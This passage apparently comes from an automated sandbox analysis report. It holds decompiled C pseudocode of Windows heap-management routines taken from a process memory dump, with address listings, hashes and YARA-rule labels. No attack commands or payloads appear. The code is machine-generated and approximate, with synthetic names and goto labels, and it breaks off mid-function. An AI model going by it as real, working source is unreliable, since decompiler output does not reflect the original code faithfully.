											_t134 =  *( *(_t157 + 0xc));
											 *(_t169 - 0x2c) = _t134;
											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
												_t42 = _t157 + 8; // 0x8
												_t135 = _t42;
												if( *(_t169 - 0x2c) == _t135) {
													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
													_t136 = _t135 + 8;
													 *(_t169 - 0x2c) = _t136;
													_t148 =  *_t136;
													_t138 =  *(_t136[1]);
													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
														 *(_t169 - 0x24) = _t121;
														L23:
														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
														_t148 =  *(_t157 + 4) & 0x0000ffff;
														if(_t121 == _t148) {
															L31:
															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
															if(( *(_t157 + 2) & 0x00000001) != 0) {
																L34:
																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
															} else {
																_t148 =  *(_t157 + 8);
																_t123 =  *( *(_t157 + 0xc));
																 *(_t169 - 0x2c) = _t123;
																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
																	goto L34;
																}
															}
														} else {
															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
															if( *(_t168 + 0x4c) == 0) {
																_t128 =  *_t127;
																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
															} else {
																_t156 =  *_t127;
																 *(_t169 - 0x30) = _t156;
																if(( *(_t168 + 0x4c) & _t156) == 0) {
																	_t128 = _t156;
																} else {
																	_t128 =  *(_t168 + 0x50) ^ _t156;
																	 *(_t169 - 0x30) = _t128;
																}
																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
															}
															 *(_t169 - 0x24) = _t154;
															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
															if(_t128 == _t148) {
																goto L31;
															}
														}
													}
												}
											}
										}
									}
								} else {
									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
										goto L12;
									}
								}
							}
						}
					}
					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
					if( *(_t168 + 0x4c) != 0) {
						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
					}
					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
					if(_t107 > 0xa) {
						L45:
						_push(_t148);
						_push(0);
						_push( *((intOrPtr*)(_t169 - 0x1c)));
						_push(_t157);
						_push(2);
						goto L46;
					} else {
						switch( *((intOrPtr*)(( *(_t107 + 0x30cfcfb) & 0x000000ff) * 4 +  &M030CFCE3))) {
							case 0:
								_push(_t148);
								_push(0);
								_push( *((intOrPtr*)(_t169 - 0x1c)));
								_push(_t157);
								_push(3);
								goto L46;
							case 1:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__edi + 0x18)));
								_push(__edx);
								_push(0xc);
								goto L46;
							case 2:
								_push(__ecx);
								_push(__ebx);
								_push(3);
								_push(__edx);
								__ecx = 0;
								goto L47;
							case 3:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__ebp - 0x1c)));
								_push(__edx);
								_push(0xe);
								goto L46;
							case 4:
								_push(__ecx);
								_push(__ebx);
								_push(8);
								_push(__edx);
								_push(0xd);
								L46:
								goto L47;
							case 5:
								goto L45;
						}
					}
					L47:
					_t98 = E030DA80D(_t168);
				}
				return E0306D0D1(_t98);
			}

0x030cfa2b
0x030cfa2b
0x030cfa2d
0x030cfa32
0x030cfa37
0x030cfa3a
0x030cfa3c
0x030cfa43
0x030cfa46
0x030cfa49
0x030cfa4f
0x030cfa55
0x030cfa58
0x030cfa5d
0x030cfa65
0x030cfa6d
0x030cfa72
0x030cfa78
0x030cfa7e
0x030cfa8c
0x030cfaa2
0x030cfaa7
0x030cfaaa
0x030cfaaf
0x030cfac4
0x030cfab1
0x030cfac0
0x030cfac0
0x030cfac8
0x030cfacb
0x030cfad5
0x030cfadb
0x030cfae1
0x030cfb05
0x030cfb05
0x030cfb08
0x030cfb0b
0x030cfb15
0x030cfb98
0x030cfb9f
0x030cfba5
0x030cfbb4
0x030cfbb6
0x030cfbb7
0x030cfbbd
0x00000000
0x030cfbbd
0x030cfb17
0x030cfb17
0x030cfb17
0x030cfb1a
0x030cfb22
0x030cfb40
0x030cfb47
0x030cfb4c
0x030cfb4e
0x030cfb54
0x030cfb5a
0x030cfb5a
0x030cfb60
0x030cfb66
0x030cfb6d
0x030cfb70
0x030cfb73
0x030cfb78
0x030cfb7d
0x030cfb8c
0x030cfb90
0x030cfbbf
0x030cfbbf
0x030cfbc6
0x030cfbcd
0x030cfc18
0x030cfc18
0x030cfc23
0x030cfc3d
0x030cfc3d
0x030cfc25
0x030cfc25
0x030cfc2b
0x030cfc2d
0x030cfc33
0x00000000
0x00000000
0x030cfc33
0x030cfbcf
0x030cfbd9
0x030cfbdf
0x030cfc00
0x030cfc06
0x030cfbe1
0x030cfbe1
0x030cfbe3
0x030cfbe9
0x030cfbf5
0x030cfbeb
0x030cfbee
0x030cfbf0
0x030cfbf0
0x030cfbf7
0x030cfbfb
0x030cfc09
0x030cfc10
0x030cfc16
0x00000000
0x00000000
0x030cfc16
0x030cfbcd
0x030cfb7d
0x030cfb60
0x030cfb54
0x030cfb22
0x030cfae3
0x030cfae3
0x030cfaed
0x00000000
0x00000000
0x030cfaed
0x030cfae1
0x030cfad5
0x030cfa8c
0x030cfc44
0x030cfc72
0x030cfc7c
0x030cfc82
0x030cfc82
0x030cfc84
0x030cfc8a
0x030cfcca
0x030cfcca
0x030cfccb
0x030cfccc
0x030cfccf
0x030cfcd0
0x00000000
0x030cfc8c
0x030cfc93
0x00000000
0x030cfc9a
0x030cfc9b
0x030cfc9c
0x030cfc9f
0x030cfca0
0x00000000
0x00000000
0x030cfca4
0x030cfca5
0x030cfca6
0x030cfca9
0x030cfcaa
0x00000000
0x00000000
0x030cfcae
0x030cfcaf
0x030cfcb0
0x030cfcb2
0x030cfcb3
0x00000000
0x00000000
0x030cfcb7
0x030cfcb8
0x030cfcb9
0x030cfcbc
0x030cfcbd
0x00000000
0x00000000
0x030cfcc1
0x030cfcc2
0x030cfcc3
0x030cfcc5
0x030cfcc6
0x030cfcd2
0x00000000
0x00000000
0x00000000
0x00000000
0x030cfc93
0x030cfcd3
0x030cfcd5
0x030cfcd5
0x030cfcdf

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8479b55a595fc4d99120b446a7dc5817f21ad5aaa514b296d6d0f47a20ef175
Instruction ID: 1377dc3e7f923994d7bcde098b14c5c07df262f24283bec03ce0f23b9778fe1e
Opcode Fuzzy Hash: e8479b55a595fc4d99120b446a7dc5817f21ad5aaa514b296d6d0f47a20ef175
Instruction Fuzzy Hash: 0A818E70A112869FDB18CF59C5906BDFBF6FB08304F18859EE845AB281D3789C81CF65

Uniqueness

Uniqueness Score: -1.00%

Function 030DDBD2, Relevance: .2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E030DDBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed short _v12;
				unsigned int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				void* _t112;
				unsigned int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x3106114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L030DD016(_t119, _t183, _t119, _t78);
									E0302FFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E030DC52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x2ffaff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E0302FFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E030DE018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x2ffaff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E0305D340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E030DD864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E030DD8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E030DA80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}

0x030ddbdc
0x030ddbde
0x030ddbe1
0x030ddbed
0x030ddbef
0x030ddbf7
0x030ddbfd
0x030ddc00
0x030ddc04
0x030ddc07
0x030ddc0c
0x030ddd1f
0x030ddd1f
0x030ddd23
0x030ddd26
0x030ddd29
0x030ddd29
0x030ddd2c
0x030ddd32
0x030ddd35
0x00000000
0x030ddd38
0x030ddd3a
0x030ddd5d
0x030ddd63
0x030ddd69
0x030ddd6e
0x030ddd71
0x030ddd78
0x030ddd7d
0x030ddd8c
0x030ddd9e
0x030ddda0
0x030dddad
0x030dddb0
0x030dddb5
0x030dddb9
0x030dddd9
0x030dddd9
0x030dddde
0x030ddde0
0x030ddde3
0x030ddde5
0x030ddde9
0x030ddde9
0x030dddee
0x030dddf6
0x030dddf6
0x030ddd97
0x00000000
0x00000000
0x030ddd9b
0x00000000
0x030ddd9b
0x030ddd7f
0x00000000
0x030ddd7f
0x030ddd3f
0x030ddd54
0x030ddd58
0x030ddd86
0x00000000
0x030ddd86
0x00000000
0x030ddd5a
0x030ddd5a
0x030ddd5a
0x00000000
0x030ddd5a
0x030ddd3f
0x030ddd38
0x030ddc12
0x030ddc15
0x030ddc25
0x030ddc31
0x030ddc34
0x030ddc3b
0x030ddc3e
0x030ddc40
0x030ddc43
0x030ddc46
0x030ddc62
0x030ddc6b
0x030ddc6d
0x030ddc48
0x030ddc4b
0x030ddc59
0x030ddc5c
0x030ddc5c
0x030ddc72
0x030ddc78
0x030ddc7f
0x030ddc81
0x030ddc81
0x030ddc84
0x030ddc88
0x030ddc8d
0x030ddc95
0x030ddc9b
0x030ddca0
0x030ddca2
0x030ddca6
0x030ddca6
0x030ddcb0
0x030ddcd1
0x030ddcd4
0x030ddcda
0x030ddcec
0x030ddcf1
0x030ddcf6
0x030ddd0c
0x030ddd1a
0x030ddd1a
0x030ddcf6
0x00000000
0x030ddcda
0x030ddcb5
0x030ddcb6
0x030ddcc5
0x030ddcca
0x030ddcca

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a61e5988ea864e2bbbd8271480706e2a6bf63923fe49f7a5d2c1f7b8a50ed1e9
Instruction ID: ebeabf96a5db7deb4934913e0226ebea5bca4960bc23b94c12f61e9a0c5fcef1
Opcode Fuzzy Hash: a61e5988ea864e2bbbd8271480706e2a6bf63923fe49f7a5d2c1f7b8a50ed1e9
Instruction Fuzzy Hash: 6A71F875E013299FCF14DF69C880ABEB7F5EF88310B154169E855EB384D634D945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030E28EC, Relevance: .2, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E030E28EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				intOrPtr _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E03032280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0x3106110; // 0xd8264b48
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0x3106110; // 0xd8264b48
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = E030E25DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												E0302FFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0x3106110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												E030E2506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												E0302FFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E0305FA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E030DA80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								E0302FFB0(_t115, _t145, _t147);
							}
							_t104 = E030E3149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E03032280(_t104, _t147);
								}
								_v5 = 0xff;
								E030E2876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}

0x030e28f5
0x030e28fa
0x030e28fe
0x030e2900
0x030e2906
0x030e2908
0x030e2908
0x030e290e
0x030e2915
0x030e2918
0x030e291b
0x030e291d
0x030e2920
0x030e2920
0x030e2929
0x030e292c
0x030e292f
0x030e2932
0x030e2935
0x030e2938
0x030e293d
0x030e293d
0x030e2940
0x030e2944
0x030e2944
0x030e2948
0x030e294a
0x030e2950
0x030e2953
0x030e2958
0x00000000
0x00000000
0x030e295a
0x030e2962
0x030e2965
0x030e2976
0x030e2978
0x030e29e0
0x030e29e4
0x030e29e6
0x030e29e8
0x030e29eb
0x030e2993
0x030e2993
0x00000000
0x030e2993
0x030e29ed
0x030e29ef
0x00000000
0x00000000
0x030e29f1
0x00000000
0x030e29f1
0x030e297a
0x030e299b
0x030e299d
0x030e29f5
0x030e29fb
0x030e29fb
0x030e2a00
0x030e2a04
0x030e2a04
0x030e2a06
0x030e2a13
0x030e2a13
0x030e2a18
0x030e2a44
0x030e2a44
0x030e2a44
0x030e2a46
0x030e2a50
0x030e2a5a
0x030e2a5e
0x030e2a99
0x030e2a9e
0x030e2aa0
0x030e2a70
0x030e2a70
0x030e2a72
0x030e2a75
0x030e2a82
0x030e2a89
0x030e2a89
0x030e2a7a
0x030e2a7f
0x030e2a7f
0x030e2a7f
0x00000000
0x030e2a7f
0x030e2aa4
0x030e2aa4
0x030e2ab6
0x030e2abd
0x030e2ac0
0x030e2ac4
0x030e2ac6
0x030e2ac9
0x030e2acf
0x030e2ad1
0x030e2ad3
0x030e2ad3
0x030e2ad3
0x030e2acf
0x030e2ad6
0x030e2ad9
0x030e2adb
0x030e2add
0x030e2af9
0x030e2af9
0x030e2aff
0x030e2adf
0x030e2adf
0x030e2ae7
0x030e2aea
0x030e2aef
0x030e2af4
0x030e2af4
0x030e2b01
0x030e2b05
0x030e2b08
0x030e2b08
0x030e2b0d
0x030e2b11
0x030e2b1b
0x030e2b20
0x00000000
0x030e2b11
0x030e2a60
0x030e2a61
0x030e2a6b
0x00000000
0x030e2a6b
0x030e2a1f
0x030e2a25
0x030e2a25
0x030e2a27
0x030e2a38
0x030e2a3d
0x030e2a3d
0x030e2a3f
0x030e2a3f
0x00000000
0x030e2a3f
0x030e2a2c
0x030e2a2c
0x030e2a31
0x00000000
0x00000000
0x030e2a36
0x030e2a36
0x00000000
0x030e2a36
0x030e2a0c
0x00000000
0x030e2a0c
0x030e29a1
0x030e29a4
0x030e29a4
0x030e29b0
0x030e29b5
0x030e29b9
0x00000000
0x030e29bf
0x030e29c3
0x030e29c6
0x030e29c6
0x030e29cd
0x030e29d3
0x030e29d8
0x00000000
0x030e29d8
0x030e29b9
0x030e2980
0x030e2983
0x030e2990
0x00000000
0x030e2989
0x030e2989
0x030e298c
0x030e298c
0x030e2995
0x030e2995
0x030e2999
0x030e2999
0x00000000
0x030e2999

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc87cfd522c3c9dd486cf087e24d889cc607b2a71ec1cd3b38daccd0c247acf4
Instruction ID: e826d76233312000d22cfaa5c990c0c1f728234c241d3da928bb70fe1dc63e27
Opcode Fuzzy Hash: bc87cfd522c3c9dd486cf087e24d889cc607b2a71ec1cd3b38daccd0c247acf4
Instruction Fuzzy Hash: CE71B475B0120A9FCB58EF69C8806AEF7FEEF88310F188969D855DB280DB74D941C790

Uniqueness

Uniqueness Score: -1.00%

Function 030AB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E030AB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3107b9c; // 0x0
				_t124 = L03034620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03059800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E030595B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E030595D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L030377F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03059910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E030595D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3107b9c; // 0x0
									_t92 = L03034620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03059910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0301A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E030AE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E030AE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E030595B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x030ab8d9
0x030ab8e4
0x00000000
0x030ab8e6
0x030ab8f3
0x030ab8f5
0x030ab8f5
0x030ab8f8
0x030ab920
0x030ab924
0x030ab936
0x030ab939
0x030ab93d
0x030ab948
0x030ab9a0
0x030ab9a0
0x030ab9a4
0x030ab9bf
0x030ab9c4
0x030ab9c6
0x030ab9cd
0x030ab9d1
0x030abad4
0x030abad8
0x030abada
0x030abadc
0x030abadc
0x030abadf
0x030abae0
0x030abae2
0x030abae4
0x030abaec
0x030abaee
0x030abaf0
0x030abaf0
0x030abaec
0x030abafb
0x030abafc
0x030abafe
0x030abb01
0x030abb01
0x00000000
0x030abb06
0x030ab9d7
0x030ab9db
0x030ab9db
0x030ab9de
0x030ab9de
0x030ab9e4
0x030ab9e7
0x030ab9ea
0x030ab9ec
0x030ab9ef
0x030ab9f3
0x030aba1b
0x030aba1b
